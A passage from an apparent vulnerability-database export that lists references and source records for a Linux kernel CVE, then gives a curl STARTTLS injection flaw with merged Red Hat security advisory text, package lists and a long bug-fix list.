"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14346"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-25040"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-2708"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2016-10228"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10878"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25041"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:2122"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-8284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-21642"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-25034"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-27618"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4752-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-15436"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24490"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25641"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.6/5.6.0-1048.52"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29369"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27152"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28915"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29371"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25656"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-44.50~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29568"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25668"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27675"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25669"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1019.21"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1023.24"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1024.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1016.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1021.22"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27830"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-44.50"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29569"
},
{
"trust": 0.1,
"url": "https://usn.ubuntu.com/4751-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1023.25"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-377704"
},
{
"db": "VULMON",
"id": "CVE-2020-35508"
},
{
"db": "PACKETSTORM",
"id": "162654"
},
{
"db": "PACKETSTORM",
"id": "162626"
},
{
"db": "PACKETSTORM",
"id": "163584"
},
{
"db": "PACKETSTORM",
"id": "163589"
},
{
"db": "PACKETSTORM",
"id": "162877"
},
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
},
{
"db": "NVD",
"id": "CVE-2020-35508"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162654",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162626",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163584",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163589",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "162877",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161556",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "161555",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-03-26T00:00:00",
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"date": "2021-03-26T00:00:00",
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"date": "2021-05-19T14:06:16",
"db": "PACKETSTORM",
"id": "162654",
"ident": null
},
{
"date": "2021-05-19T13:56:20",
"db": "PACKETSTORM",
"id": "162626",
"ident": null
},
{
"date": "2021-07-21T16:02:50",
"db": "PACKETSTORM",
"id": "163584",
"ident": null
},
{
"date": "2021-07-21T16:03:31",
"db": "PACKETSTORM",
"id": "163589",
"ident": null
},
{
"date": "2021-06-01T14:45:29",
"db": "PACKETSTORM",
"id": "162877",
"ident": null
},
{
"date": "2021-02-25T15:31:12",
"db": "PACKETSTORM",
"id": "161556",
"ident": null
},
{
"date": "2021-02-25T15:31:02",
"db": "PACKETSTORM",
"id": "161555",
"ident": null
},
{
"date": "2021-02-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"date": "2021-12-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"date": "2021-03-26T17:15:12.203000",
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2023-02-12T00:00:00",
"db": "VULHUB",
"id": "VHN-377704",
"ident": null
},
{
"date": "2021-04-12T00:00:00",
"db": "VULMON",
"id": "CVE-2020-35508",
"ident": null
},
{
"date": "2023-02-03T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202102-1668",
"ident": null
},
{
"date": "2021-12-02T09:13:00",
"db": "JVNDB",
"id": "JVNDB-2020-016425",
"ident": null
},
{
"date": "2024-11-21T05:27:27.440000",
"db": "NVD",
"id": "CVE-2020-35508",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "161556"
},
{
"db": "PACKETSTORM",
"id": "161555"
},
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 0.8
},
"title": {
"_id": null,
"data": "Linux\u00a0Kernel\u00a0 Initialization vulnerabilities",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-016425"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202102-1668"
}
],
"trust": 0.6
}
}
VAR-202109-1789
Vulnerability from variot - Updated: 2026-03-09 21:33When curl >= 7.20.0 and <= 7.78.0 connects to an IMAP or POP3 server to retrieve data using STARTTLS to upgrade to TLS security, the server can respond and send back multiple responses at once that curl caches. curl would then upgrade to TLS but not flush the in-queue of cached responses but instead continue using and trustingthe responses it got before the TLS handshake as if they were authenticated.Using this flaw, it allows a Man-In-The-Middle attacker to first inject the fake responses, then pass-through the TLS traffic from the legitimate server and trick curl into sending data back to the user thinking the attacker's injected data comes from the TLS-protected server. A STARTTLS protocol injection flaw via man-in-the-middle was found in curl prior to 7.79.0. Such multiple "pipelined" responses are cached by curl. Over POP3 and IMAP an attacker can inject fake response data. Relevant releases/architectures:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Server (v. 7) - x86_64 .NET Core on Red Hat Enterprise Linux Workstation (v. 7) - x86_64
- Description:
.NET Core is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.
Security Fix(es):
-
curl: Leak of authentication credentials in URL via automatic Referer (CVE-2021-22876)
-
curl: Bad connection reuse due to flawed path name checks (CVE-2021-22924)
-
curl: Requirement to use TLS not properly enforced for IMAP, POP3, and FTP protocols (CVE-2021-22946)
-
curl: Server responses received before STARTTLS processed after TLS handshake (CVE-2021-22947)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Package List:
.NET Core on Red Hat Enterprise Linux ComputeNode (v. 7):
Source: rh-dotnet31-curl-7.61.1-22.el7_9.src.rpm
x86_64: rh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Server (v. 7):
Source: rh-dotnet31-curl-7.61.1-22.el7_9.src.rpm
x86_64: rh-dotnet31-curl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-curl-debuginfo-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-7.61.1-22.el7_9.x86_64.rpm rh-dotnet31-libcurl-devel-7.61.1-22.el7_9.x86_64.rpm
.NET Core on Red Hat Enterprise Linux Workstation (v. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.10 images
Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments.
Clusters and applications are all visible and managed from a single console — with security policy built in. Bugs fixed (https://bugzilla.redhat.com/):
2004944 - CVE-2021-23440 nodejs-set-value: type confusion allows bypass of CVE-2019-10747 2006009 - CVE-2021-3795 semver-regex: inefficient regular expression complexity 2013652 - RHACM 2.2.10 images
- -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
===================================================================== Red Hat Security Advisory
Synopsis: Moderate: OpenShift Container Platform 4.10.3 security update Advisory ID: RHSA-2022:0056-01 Product: Red Hat OpenShift Enterprise Advisory URL: https://access.redhat.com/errata/RHSA-2022:0056 Issue date: 2022-03-10 CVE Names: CVE-2014-3577 CVE-2016-10228 CVE-2017-14502 CVE-2018-20843 CVE-2018-1000858 CVE-2019-8625 CVE-2019-8710 CVE-2019-8720 CVE-2019-8743 CVE-2019-8764 CVE-2019-8766 CVE-2019-8769 CVE-2019-8771 CVE-2019-8782 CVE-2019-8783 CVE-2019-8808 CVE-2019-8811 CVE-2019-8812 CVE-2019-8813 CVE-2019-8814 CVE-2019-8815 CVE-2019-8816 CVE-2019-8819 CVE-2019-8820 CVE-2019-8823 CVE-2019-8835 CVE-2019-8844 CVE-2019-8846 CVE-2019-9169 CVE-2019-13050 CVE-2019-13627 CVE-2019-14889 CVE-2019-15903 CVE-2019-19906 CVE-2019-20454 CVE-2019-20807 CVE-2019-25013 CVE-2020-1730 CVE-2020-3862 CVE-2020-3864 CVE-2020-3865 CVE-2020-3867 CVE-2020-3868 CVE-2020-3885 CVE-2020-3894 CVE-2020-3895 CVE-2020-3897 CVE-2020-3899 CVE-2020-3900 CVE-2020-3901 CVE-2020-3902 CVE-2020-8927 CVE-2020-9802 CVE-2020-9803 CVE-2020-9805 CVE-2020-9806 CVE-2020-9807 CVE-2020-9843 CVE-2020-9850 CVE-2020-9862 CVE-2020-9893 CVE-2020-9894 CVE-2020-9895 CVE-2020-9915 CVE-2020-9925 CVE-2020-9952 CVE-2020-10018 CVE-2020-11793 CVE-2020-13434 CVE-2020-14391 CVE-2020-15358 CVE-2020-15503 CVE-2020-25660 CVE-2020-25677 CVE-2020-27618 CVE-2020-27781 CVE-2020-29361 CVE-2020-29362 CVE-2020-29363 CVE-2021-3121 CVE-2021-3326 CVE-2021-3449 CVE-2021-3450 CVE-2021-3516 CVE-2021-3517 CVE-2021-3518 CVE-2021-3520 CVE-2021-3521 CVE-2021-3537 CVE-2021-3541 CVE-2021-3733 CVE-2021-3749 CVE-2021-20305 CVE-2021-21684 CVE-2021-22946 CVE-2021-22947 CVE-2021-25215 CVE-2021-27218 CVE-2021-30666 CVE-2021-30761 CVE-2021-30762 CVE-2021-33928 CVE-2021-33929 CVE-2021-33930 CVE-2021-33938 CVE-2021-36222 CVE-2021-37750 CVE-2021-39226 CVE-2021-41190 CVE-2021-43813 CVE-2021-44716 CVE-2021-44717 CVE-2022-0532 CVE-2022-21673 CVE-2022-24407 =====================================================================
- Summary:
Red Hat OpenShift Container Platform release 4.10.3 is now available with updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.
This advisory contains the container images for Red Hat OpenShift Container Platform 4.10.3. See the following advisory for the RPM packages for this release:
https://access.redhat.com/errata/RHSA-2022:0055
Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Security Fix(es):
- gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation (CVE-2021-3121)
- grafana: Snapshot authentication bypass (CVE-2021-39226)
- golang: net/http: limit growth of header canonicalization cache (CVE-2021-44716)
- nodejs-axios: Regular expression denial of service in trim function (CVE-2021-3749)
- golang: syscall: don't close fd 0 on ForkExec error (CVE-2021-44717)
- grafana: Forward OAuth Identity Token can allow users to access some data sources (CVE-2022-21673)
- grafana: directory traversal vulnerability (CVE-2021-43813)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
You may download the oc tool and use it to inspect release image metadata as follows:
(For x86_64 architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-x86_64
The image digest is sha256:7ffe4cd612be27e355a640e5eec5cd8f923c1400d969fd590f806cffdaabcc56
(For s390x architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-s390x
The image digest is sha256:4cf21a9399da1ce8427246f251ae5dedacfc8c746d2345f9cfe039ed9eda3e69
(For ppc64le architecture)
$ oc adm release info quay.io/openshift-release-dev/ocp-release:4.10.3-ppc64le
The image digest is sha256:4ee571da1edf59dfee4473aa4604aba63c224bf8e6bcf57d048305babbbde93c
All OpenShift Container Platform 4.10 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift Console or the CLI oc command. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Solution:
For OpenShift Container Platform 4.10 see the following documentation, which will be updated shortly for this release, for moderate instructions on how to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.10/release_notes/ocp-4-10-release-notes.html
Details on how to access this content are available at https://docs.openshift.com/container-platform/4.10/updating/updating-cluster-cli.html
- Bugs fixed (https://bugzilla.redhat.com/):
1808240 - Always return metrics value for pods under the user's namespace
1815189 - feature flagged UI does not always become available after operator installation
1825034 - e2e: Mock CSI tests fail on IBM ROKS clusters
1826225 - edge terminated h2 (gRPC) connections need a haproxy template change to work correctly
1860774 - csr for vSphere egress nodes were not approved automatically during cert renewal
1878106 - token inactivity timeout is not shortened after oauthclient/oauth config values are lowered
1878925 - 'oc adm upgrade --to ...' rejects versions which occur only in history, while the cluster-version operator supports history fallback
1880738 - origin e2e test deletes original worker
1882983 - oVirt csi driver should refuse to provision RWX and ROX PV
1886450 - Keepalived router id check not documented for RHV/VMware IPI
1889488 - The metrics endpoint for the Scheduler is not protected by RBAC
1894431 - Router pods fail to boot if the SSL certificate applied is missing an empty line at the bottom
1896474 - Path based routing is broken for some combinations
1897431 - CIDR support for additional network attachment with the bridge CNI plug-in
1903408 - NodePort externalTrafficPolicy does not work for ovn-kubernetes
1907433 - Excessive logging in image operator
1909906 - The router fails with PANIC error when stats port already in use
1911173 - [MSTR-998] Many charts' legend names show {{}} instead of words
1914053 - pods assigned with Multus whereabouts IP get stuck in ContainerCreating state after node rebooting.
1916169 - a reboot while MCO is applying changes leaves the node in undesirable state and MCP looks fine (UPDATED=true)
1917893 - [ovirt] install fails: due to terraform error "Cannot attach Virtual Disk: Disk is locked" on vm resource
1921627 - GCP UPI installation failed due to exceeding gcp limitation of instance group name
1921650 - CVE-2021-3121 gogo/protobuf: plugin/unmarshal/unmarshal.go lacks certain index validation
1926522 - oc adm catalog does not clean temporary files
1927478 - Default CatalogSources deployed by marketplace do not have toleration for tainted nodes.
1928141 - kube-storage-version-migrator constantly reporting type "Upgradeable" status Unknown
1928285 - [LSO][OCS][arbiter] OCP Console shows no results while in fact underlying setup of LSO localvolumeset and it's storageclass is not yet finished, confusing users
1931594 - [sig-cli] oc --request-timeout works as expected fails frequently on s390x
1933847 - Prometheus goes unavailable (both instances down) during 4.8 upgrade
1937085 - RHV UPI inventory playbook missing guarantee_memory
1937196 - [aws ebs csi driver] events for block volume expansion may cause confusion
1938236 - vsphere-problem-detector does not support overriding log levels via storage CR
1939401 - missed labels for CMO/openshift-state-metric/telemeter-client/thanos-querier pods
1939435 - Setting an IPv6 address in noProxy field causes error in openshift installer
1939552 - [sig-api-machinery] CustomResourcePublishOpenAPI [Privileged:ClusterAdmin] works for CRD preserving unknown fields in an embedded object [Conformance] [Suite:openshift/conformance/parallel/minimal] [Suite:k8s]
1942913 - ThanosSidecarUnhealthy isn't resilient to WAL replays.
1943363 - [ovn] CNO should gracefully terminate ovn-northd
1945274 - ostree-finalize-staged.service failed while upgrading a rhcos node to 4.6.17
1948080 - authentication should not set Available=False APIServices_Error with 503s
1949262 - Prometheus Statefulsets should have 2 replicas and hard affinity set
1949672 - [GCP] Update 4.8 UPI template to match ignition version: 3.2.0
1950827 - [LSO] localvolumediscoveryresult name is not friendly to customer
1952576 - csv_succeeded metric not present in olm-operator for all successful CSVs
1953264 - "remote error: tls: bad certificate" logs in prometheus-operator container
1955300 - Machine config operator reports unavailable for 23m during upgrade
1955489 - Alertmanager Statefulsets should have 2 replicas and hard affinity set
1955490 - Thanos ruler Statefulsets should have 2 replicas and hard affinity set
1955544 - [IPI][OSP] densed master-only installation with 0 workers fails due to missing worker security group on masters
1956496 - Needs SR-IOV Docs Upstream
1956739 - Permission for authorized_keys for core user changes from core user to root when changed the pull secret
1956776 - [vSphere] Installer should do pre-check to ensure user-provided network name is valid
1956964 - upload a boot-source to OpenShift virtualization using the console
1957547 - [RFE]VM name is not auto filled in dev console
1958349 - ovn-controller doesn't release the memory after cluster-density run
1959352 - [scale] failed to get pod annotation: timed out waiting for annotations
1960378 - icsp allows mirroring of registry root - install-config imageContentSources does not
1960674 - Broken test: [sig-imageregistry][Serial][Suite:openshift/registry/serial] Image signature workflow can push a signed image to openshift registry and verify it [Suite:openshift/conformance/serial]
1961317 - storage ClusterOperator does not declare ClusterRoleBindings in relatedObjects
1961391 - String updates
1961509 - DHCP daemon pod should have CPU and memory requests set but not limits
1962066 - Edit machine/machineset specs not working
1962206 - openshift-multus/dhcp-daemon set should meet platform requirements for update strategy that have maxUnavailable update of 10 or 33 percent
1963053 - oc whoami --show-console should show the web console URL, not the server api URL
1964112 - route SimpleAllocationPlugin: host name validation errors: spec.host: Invalid value: ... must be no more than 63 characters
1964327 - Support containers with name:tag@digest
1964789 - Send keys and disconnect does not work for VNC console
1965368 - ClusterQuotaAdmission received non-meta object - message constantly reported in OpenShift Container Platform 4.7
1966445 - Unmasking a service doesn't work if it masked using MCO
1966477 - Use GA version in KAS/OAS/OauthAS to avoid: "audit.k8s.io/v1beta1" is deprecated and will be removed in a future release, use "audit.k8s.io/v1" instead
1966521 - kube-proxy's userspace implementation consumes excessive CPU
1968364 - [Azure] when using ssh type ed25519 bootstrap fails to come up
1970021 - nmstate does not persist its configuration due to overlay systemd-connections-merged mount
1970218 - MCO writes incorrect file contents if compression field is specified
1970331 - [sig-auth][Feature:SCC][Early] should not have pod creation failures during install [Suite:openshift/conformance/parallel]
1970805 - Cannot create build when docker image url contains dir structure
1972033 - [azure] PV region node affinity is failure-domain.beta.kubernetes.io instead of topology.kubernetes.io
1972827 - image registry does not remain available during upgrade
1972962 - Should set the minimum value for the --max-icsp-size flag of oc adm catalog mirror
1973447 - ovn-dbchecker peak memory spikes to ~500MiB during cluster-density run
1975826 - ovn-kubernetes host directed traffic cannot be offloaded as CT zone 64000 is not established
1976301 - [ci] e2e-azure-upi is permafailing
1976399 - During the upgrade from OpenShift 4.5 to OpenShift 4.6 the election timers for the OVN north and south databases did not change.
1976674 - CCO didn't set Upgradeable to False when cco mode is configured to Manual on azure platform
1976894 - Unidling a StatefulSet does not work as expected
1977319 - [Hive] Remove stale cruft installed by CVO in earlier releases
1977414 - Build Config timed out waiting for condition 400: Bad Request
1977929 - [RFE] Display Network Attachment Definitions from openshift-multus namespace during OCS deployment via UI using Multus
1978528 - systemd-coredump started and failed intermittently for unknown reasons
1978581 - machine-config-operator: remove runlevel from mco namespace
1979562 - Cluster operators: don't show messages when neither progressing, degraded or unavailable
1979962 - AWS SDN Network Stress tests have not passed in 4.9 release-openshift-origin-installer-e2e-aws-sdn-network-stress-4.9
1979966 - OCP builds always fail when run on RHEL7 nodes
1981396 - Deleting pool inside pool page the pool stays in Ready phase in the heading
1981549 - Machine-config daemon does not recover from broken Proxy configuration
1981867 - [sig-cli] oc explain should contain proper fields description for special types [Suite:openshift/conformance/parallel]
1981941 - Terraform upgrade required in openshift-installer to resolve multiple issues
1982063 - 'Control Plane' is not translated in Simplified Chinese language in Home->Overview page
1982498 - Default registry credential path should be adjusted to use containers/auth.json for oc commands
1982662 - Workloads - DaemonSets - Add storage: i18n misses
1982726 - kube-apiserver audit logs show a lot of 404 errors for DELETE "/secrets/encryption-config" on single node clusters
1983758 - upgrades are failing on disruptive tests
1983964 - Need Device plugin configuration for the NIC "needVhostNet" & "isRdma"
1984592 - global pull secret not working in OCP4.7.4+ for additional private registries
1985073 - new-in-4.8 ExtremelyHighIndividualControlPlaneCPU fires on some GCP update jobs
1985486 - Cluster Proxy not used during installation on OSP with Kuryr
1985724 - VM Details Page missing translations
1985838 - [OVN] CNO exportNetworkFlows does not clear collectors when deleted
1985933 - Downstream image registry recommendation
1985965 - oVirt CSI driver does not report volume stats
1986216 - [scale] SNO: Slow Pod recovery due to "timed out waiting for OVS port binding"
1986237 - "MachineNotYetDeleted" in Pending state , alert not fired
1986239 - crictl create fails with "PID namespace requested, but sandbox infra container invalid"
1986302 - console continues to fetch prometheus alert and silences for normal user
1986314 - Current MTV installation for KubeVirt import flow creates unusable Forklift UI
1986338 - error creating list of resources in Import YAML
1986502 - yaml multi file dnd duplicates previous dragged files
1986819 - fix string typos for hot-plug disks
1987044 - [OCPV48] Shutoff VM is being shown as "Starting" in WebUI when using spec.runStrategy Manual/RerunOnFailure
1987136 - Declare operatorframework.io/arch. labels for all operators
1987257 - Go-http-client user-agent being used for oc adm mirror requests
1987263 - fsSpaceFillingUpWarningThreshold not aligned to Kubernetes Garbage Collection Threshold
1987445 - MetalLB integration: All gateway routers in the cluster answer ARP requests for LoadBalancer services IP
1988406 - SSH key dropped when selecting "Customize virtual machine" in UI
1988440 - Network operator changes ovnkube-config too early causing ovnkube-master pods to crashloop during cluster upgrade
1988483 - Azure drop ICMP need to frag FRAG when using OVN: openshift-apiserver becomes False after env runs some time due to communication between one master to pods on another master fails with "Unable to connect to the server"
1988879 - Virtual media based deployment fails on Dell servers due to pending Lifecycle Controller jobs
1989438 - expected replicas is wrong
1989502 - Developer Catalog is disappearing after short time
1989843 - 'More' and 'Show Less' functions are not translated on several page
1990014 - oc debug does not work for Windows pods
1990190 - e2e testing failed with basic manifest: reason/ExternalProvisioning waiting for a volume to be created
1990193 - 'more' and 'Show Less' is not being translated on Home -> Search page
1990255 - Partial or all of the Nodes/StorageClasses don't appear back on UI after text is removed from search bar
1990489 - etcdHighNumberOfFailedGRPCRequests fires only on metal env in CI
1990506 - Missing udev rules in initramfs for /dev/disk/by-id/scsi- symlinks
1990556 - get-resources.sh doesn't honor the no_proxy settings even with no_proxy var
1990625 - Ironic agent registers with SLAAC address with privacy-stable
1990635 - CVO does not recognize the channel change if desired version and channel changed at the same time
1991067 - github.com can not be resolved inside pods where cluster is running on openstack.
1991573 - Enable typescript strictNullCheck on network-policies files
1991641 - Baremetal Cluster Operator still Available After Delete Provisioning
1991770 - The logLevel and operatorLogLevel values do not work with Cloud Credential Operator
1991819 - Misspelled word "ocurred" in oc inspect cmd
1991942 - Alignment and spacing fixes
1992414 - Two rootdisks show on storage step if 'This is a CD-ROM boot source' is checked
1992453 - The configMap failed to save on VM environment tab
1992466 - The button 'Save' and 'Reload' are not translated on vm environment tab
1992475 - The button 'Open console in New Window' and 'Disconnect' are not translated on vm console tab
1992509 - Could not customize boot source due to source PVC not found
1992541 - all the alert rules' annotations "summary" and "description" should comply with the OpenShift alerting guidelines
1992580 - storageProfile should stay with the same value by check/uncheck the apply button
1992592 - list-type missing in oauth.config.openshift.io for identityProviders breaking Server Side Apply
1992777 - [IBMCLOUD] Default "ibm_iam_authorization_policy" is not working as expected in all scenarios
1993364 - cluster destruction fails to remove router in BYON with Kuryr as primary network (even after BZ 1940159 got fixed)
1993376 - periodic-ci-openshift-release-master-ci-4.6-upgrade-from-stable-4.5-e2e-azure-upgrade is permfailing
1994094 - Some hardcodes are detected at the code level in OpenShift console components
1994142 - Missing required cloud config fields for IBM Cloud
1994733 - MetalLB: IP address is not assigned to service if there is duplicate IP address in two address pools
1995021 - resolv.conf and corefile sync slows down/stops after keepalived container restart
1995335 - [SCALE] ovnkube CNI: remove ovs flows check
1995493 - Add Secret to workload button and Actions button are not aligned on secret details page
1995531 - Create RDO-based Ironic image to be promoted to OKD
1995545 - Project drop-down amalgamates inside main screen while creating storage system for odf-operator
1995887 - [OVN]After reboot egress node, lr-policy-list was not correct, some duplicate records or missed internal IPs
1995924 - CMO should report Upgradeable: false when HA workload is incorrectly spread
1996023 - kubernetes.io/hostname values are larger than filter when create localvolumeset from webconsole
1996108 - Allow backwards compatibility of shared gateway mode to inject host-based routes into OVN
1996624 - 100% of the cco-metrics/cco-metrics targets in openshift-cloud-credential-operator namespace are down
1996630 - Fail to delete the first Authorized SSH Key input box on Advanced page
1996647 - Provide more useful degraded message in auth operator on DNS errors
1996736 - Large number of 501 lr-policies in INCI2 env
1996886 - timedout waiting for flows during pod creation and ovn-controller pegged on worker nodes
1996916 - Special Resource Operator(SRO) - Fail to deploy simple-kmod on GCP
1996928 - Enable default operator indexes on ARM
1997028 - prometheus-operator update removes env var support for thanos-sidecar
1997059 - Failed to create cluster in AWS us-east-1 region due to a local zone is used
1997226 - Ingresscontroller reconcilations failing but not shown in operator logs or status of ingresscontroller.
1997245 - "Subscription already exists in openshift-storage namespace" error message is seen while installing odf-operator via UI
1997269 - Have to refresh console to install kube-descheduler
1997478 - Storage operator is not available after reboot cluster instances
1997509 - flake: [sig-cli] oc builds new-build [Skipped:Disconnected] [Suite:openshift/conformance/parallel]
1997967 - storageClass is not reserved from default wizard to customize wizard
1998035 - openstack IPI CI: custom var-lib-etcd.mount (ramdisk) unit is racing due to incomplete After/Before order
1998038 - [e2e][automation] add tests for UI for VM disk hot-plug
1998087 - Fix CephHealthCheck wrapping contents and add data-tests for HealthItem and SecondaryStatus
1998174 - Create storageclass gp3-csi after install ocp cluster on aws
1998183 - "r: Bad Gateway" info is improper
1998235 - Firefox warning: Cookie “csrf-token” will be soon rejected
1998377 - Filesystem table head is not full displayed in disk tab
1998378 - Virtual Machine is 'Not available' in Home -> Overview -> Cluster inventory
1998519 - Add fstype when create localvolumeset instance on web console
1998951 - Keepalived conf ingress peer on in Dual stack cluster contains both IPv6 and IPv4 addresses
1999076 - [UI] Page Not Found error when clicking on Storage link provided in Overview page
1999079 - creating pods before sriovnetworknodepolicy sync up succeed will cause node unschedulable
1999091 - Console update toast notification can appear multiple times
1999133 - removing and recreating static pod manifest leaves pod in error state
1999246 - .indexignore is not ingore when oc command load dc configuration
1999250 - ArgoCD in GitOps operator can't manage namespaces
1999255 - ovnkube-node always crashes out the first time it starts
1999261 - ovnkube-node log spam (and security token leak?)
1999309 - While installing odf-operator via UI, web console update pop-up navigates to OperatorHub -> Operator Installation page
1999314 - console-operator is slow to mark Degraded as False once console starts working
1999425 - kube-apiserver with "[SHOULD NOT HAPPEN] failed to update managedFields" err="failed to convert new object (machine.openshift.io/v1beta1, Kind=MachineHealthCheck)
